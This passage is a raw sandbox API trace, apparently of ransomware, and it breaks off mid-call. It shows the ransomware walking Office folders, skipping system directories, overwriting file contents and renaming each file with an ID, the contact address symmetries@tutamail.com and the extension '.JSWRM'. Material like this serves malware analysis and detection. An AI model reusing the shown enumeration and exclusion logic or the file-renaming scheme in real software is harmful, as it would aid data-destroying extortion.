Office\\root\\Office16\\1033\\TIMESOLN.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\timesoln.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.118] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=370768) returned 1 [0122.118] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.118] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.128] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.128] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.129] CloseHandle (hObject=0x238) returned 1 [0122.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0122.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0122.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0122.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.130] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TIMESOLN.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\timesoln.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TIMESOLN.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\timesoln.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0122.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0122.131] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29048, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="UcAddinRes.dll", cAlternateFileName="UCADDI~1.DLL")) returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2=".") returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="..") returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="...") returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="windows") returned -1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="recovery") returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="perflogs") returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="documents and settings") returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="system volume information") returned 1 [0122.131] lstrcmpiW (lpString1="UcAddinRes.dll", lpString2="msocache") returned 1 [0122.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UcAddinRes.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UcAddinRes.dll", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UcAddinRes.dll", lpUsedDefaultChar=0x0) returned 14 [0122.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0122.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UcAddinRes.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UcAddinRes.dll", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UcAddinRes.dll", lpUsedDefaultChar=0x0) returned 14 [0122.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0122.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.131] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0dcc568, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13a048, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="UccApiRes.dll", cAlternateFileName="UCCAPI~1.DLL")) returned 1 [0122.131] lstrcmpiW (lpString1="UccApiRes.dll", lpString2=".") returned 1 [0122.131] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="..") returned 1 [0122.131] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="...") returned 1 [0122.131] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="windows") returned -1 [0122.131] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="recovery") returned 1 [0122.131] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="perflogs") returned 1 [0122.131] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="documents and settings") returned 1 [0122.132] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.132] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="system volume information") returned 1 [0122.132] lstrcmpiW (lpString1="UccApiRes.dll", lpString2="msocache") returned 1 [0122.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0122.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UccApiRes.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UccApiRes.dll", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UccApiRes.dll", lpUsedDefaultChar=0x0) returned 13 [0122.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0122.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0122.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UccApiRes.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UccApiRes.dll", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UccApiRes.dll", lpUsedDefaultChar=0x0) returned 13 [0122.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0122.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.132] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x10660, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="UmOutlookStrings.dll", cAlternateFileName="UMOUTL~1.DLL")) returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2=".") returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="..") returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="...") returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="windows") returned -1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="recovery") returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="perflogs") returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="documents and settings") returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="system volume information") returned 1 [0122.132] lstrcmpiW (lpString1="UmOutlookStrings.dll", lpString2="msocache") returned 1 [0122.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UmOutlookStrings.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0122.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UmOutlookStrings.dll", cchWideChar=20, lpMultiByteStr=0x240f70, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UmOutlookStrings.dll", lpUsedDefaultChar=0x0) returned 20 [0122.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UmOutlookStrings.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0122.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UmOutlookStrings.dll", cchWideChar=20, lpMultiByteStr=0x241308, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UmOutlookStrings.dll", lpUsedDefaultChar=0x0) returned 20 [0122.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0122.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0122.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0122.133] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4809621, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4809621, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4809621, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x74c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VALVE.VRD", cAlternateFileName="")) returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2=".") returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="..") returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="...") returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="windows") returned -1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="recovery") returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="perflogs") returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="documents and settings") returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="$RECYCLE.BIN") returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="system volume information") returned 1 [0122.133] lstrcmpiW (lpString1="VALVE.VRD", lpString2="msocache") returned 1 [0122.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VALVE.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VALVE.VRD", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VALVE.VRD", lpUsedDefaultChar=0x0) returned 9 [0122.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VALVE.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VALVE.VRD", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VALVE.VRD", lpUsedDefaultChar=0x0) returned 9 [0122.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0122.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0122.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0122.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VALVE.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\valve.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.134] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1868) returned 1 [0122.134] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x740) returned 0x20c6c0 [0122.134] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x740, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x740, lpOverlapped=0x0) returned 1 [0122.135] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.135] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x740, lpOverlapped=0x0) returned 1 [0122.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0122.136] CloseHandle (hObject=0x238) returned 1 [0122.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0122.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0122.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0122.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0122.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0122.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.136] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VALVE.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\valve.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VALVE.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\valve.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0122.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0122.137] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f3541d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f3541d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f3541d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb078, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISBRRES.DLL", cAlternateFileName="")) returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2=".") returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="..") returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="...") returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="windows") returned -1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="recovery") returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="perflogs") returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="documents and settings") returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="system volume information") returned 1 [0122.137] lstrcmpiW (lpString1="VISBRRES.DLL", lpString2="msocache") returned 1 [0122.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISBRRES.DLL", lpUsedDefaultChar=0x0) returned 12 [0122.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0122.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISBRRES.DLL", lpUsedDefaultChar=0x0) returned 12 [0122.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0122.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0122.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0122.138] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19d7f1e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x19d7f1e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x19fdec5, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb060, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISCOLOR.VSL", cAlternateFileName="")) returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2=".") returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2="..") returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", 